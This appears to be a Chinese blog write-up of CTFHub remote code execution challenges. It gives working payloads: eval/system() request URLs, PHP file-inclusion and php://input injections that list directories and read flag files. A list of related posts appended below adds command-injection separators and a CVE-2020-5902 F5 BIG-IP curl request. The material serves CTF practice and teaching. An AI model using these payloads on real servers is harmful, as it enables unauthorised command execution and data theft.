CTFHUB---RCE

阿新 • • 發佈：2022-04-13

遠端程式碼/命令執行漏洞

1.eval執行

<?php
if (isset($_REQUEST['cmd'])) {
eval($_REQUEST["cmd"]);
} else {
highlight_file(__FILE__);
}
?>

request接受post和get請求，接受cmd引數

使用遠端系統命令遍歷目錄

http://challenge-51609bf458280f0b.sandbox.ctfhub.com:10800/index.php?cmd=system(%27ls%20../../../%27);

使用cat命令檢視flag

http://challenge-51609bf458280f0b.sandbox.ctfhub.com:10800/index.php?cmd=system(%27cat%20../../../flag_20969%27);

2.檔案包含

可以看到裡面有一個include() 函式。
首先需要了解一下，什麼是include() 的函式。

include()/require()/include_once()/require_once()引數可控的情況下，如匯入為非.php檔案，則仍按照php語法進行解析，這是include()函式所決定的。

通過 include 或 require 語句，可以將 PHP 檔案的內容插入另一個 PHP 檔案（在伺服器執行它之前）。

可以看到eval函式，將請求的引數作為命令執行。可是txt檔案是無法利用的，所以想到剛才的index頁面中，有一個include函式，或許可以利用一下.

我們通過get提交，將shell.txt的內容合併到index.php中，嘗試post提交ctfhub的值，發現被執行了，然後輸出了當下目錄的檔案。接下來就是查詢flag。檢視flag了

火狐hackbar

ctfhub=system('find / -name flag');

ctfhub=system('cat /flag');

3.php://input

http://challenge-70a90084222015b8.sandbox.ctfhub.com:10800/?file=php://input

<?php system('ls');?>

<?php system('cat ../../../flag_13152');?>

4.遠端包含

CTFHub RCE解析

昨天大致學了一下命令執行，那我們今天開始實戰。在CTFHu裡練習一下 1.eval執行

ctfhub-rce

檔案包含參考:php手冊，php偽協議總結 PHP手冊對於偽協議的說明:PHP 帶有很多內建 URL 風格的封裝協議，可用於類似 fopen()、 copy()、 file_exists() 和 filesize() 的檔案系統函式。除了這些封裝協議，還能通過

CTFHUB---RCE

遠端程式碼/命令執行漏洞 1.eval執行 <?phpif (isset($_REQUEST[\'cmd\'])) { eval($_REQUEST[\"cmd\"]);} else { highlight_file(__FILE__);}?>

CTFHUB-技能樹-Web-RCE(下)

這一篇講命令注入常用特殊字元：cmd1|cmd2:無論cmd1是否執行成功，cmd2將被執行cmd1&cmd2:無論cmd1是否執行成功，cmd2將被執行cmd1;cmd2:無論cmd1是否執行成功，cmd2將被執行cmd1||cmd2:僅在cmd1執行失敗時才執

[CTFHub] Web RCE Write ups

技術標籤：CTFCTFCTFHub資訊保安命令注入輸入 127.0.0.1 | ls -al 檢視檔案 127.0.0.1 | cat [flag檔名]

CTFHub技能樹web（持續更新）--RCE--命令注入--過濾空格

技術標籤：CTFHub 過濾空格這次過濾了空格，使用ls檢視當前目錄： 127.0.0.1&ls

Kali虛擬機器利用msf17-010執行RCE提權（針對Windows Server 2008以及2003）

寫在前面：老師上課的演示是利用了ms17-010的exploit/windows/smb/ms17_010_enternalblue,我們可以通過use exploit/windows/smb/ms17_010_enternalblue再info檢視適用於什麼版本，否則拿這個去攻擊Windows Server 2

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行RCE

cve-2020-5902 : RCE:curl -v -k \'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin\'

F5 BIG-IP 遠端程式碼執行RCE(CVE-2020-5902)復現

漏洞簡介 F5 BIG-IP 是美國``F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

CVE-2020-5902 f5-big-ip Read File&RCE利用方式

介紹： F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

漏洞復現-CVE-2017-12629-RCE-solr:XXE

0x00 實驗環境攻擊機：Win 10、Win Server 2012 R2 靶機：Ubuntu18 （docker搭建的vulhub靶場）

通達OA任意檔案上傳+檔案包含RCE漏洞復現(附自寫EXP)

一、環境搭建：下載通達OA的安裝包，根據提示點選下一步安裝即可，安裝完成，訪問本機ip即可

CVE-2020-5902 F5 BIG-IP RCE復現

目錄簡介影響版本搜尋語法原理解析手動復現利用工具參考簡介 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

【web安全】PHP無參RCE

介紹無引數RCE的形式如下，即只允許函式“套娃”，不允許傳入其他引數。 if(\';\' === preg_replace(\'/[^\\W]+\$(?R)?\$/\', \'\', $_GET[\'code\'])) {

漏洞復現-fastjson1.2.24-RCE

0x00 實驗環境攻擊機：Win 10、Win Server2012 R2（公網環境，惡意java檔案所在伺服器）

RCE - Pikachu

概述：遠端系統命令執行一般出現這種漏洞，是因為應用系統從設計上需要給使用者提供指定的遠端命令操作的介面

[GXYCTF2019]禁止套娃無引數RCE

復現一下buuctf上的[GXYCTF2019]禁止套娃 BUUCTF增設了waf 所以fuzz都不能用了.. Git洩露，不知道為啥我的GitHack掃不到呢？（頭大）

漏洞預警：深信服edr控制端存在大量RCE漏洞，建議下線處理

建議深信服edr裝置暫時下線，rce你是補不完的。等待官方進一步修復 hw第一天，群裡爆出深信服edr控制端poc。poc在這裡就不放了。下面我們分析一下

通達OA最新RCE漏洞 0Day(附帶exp)

本片文章僅用於教學請不要用於非法用途漏洞影響版本 TDOA11.6 漏洞環境 TDOA11.6 復現

RCE

1.RCE(remote command/code execute)概述 RCE漏洞，可以讓攻擊者直接向後臺伺服器遠端注入作業系統命令或者程式碼，從而控制後臺系統。

CTFHUB---RCE

相關推薦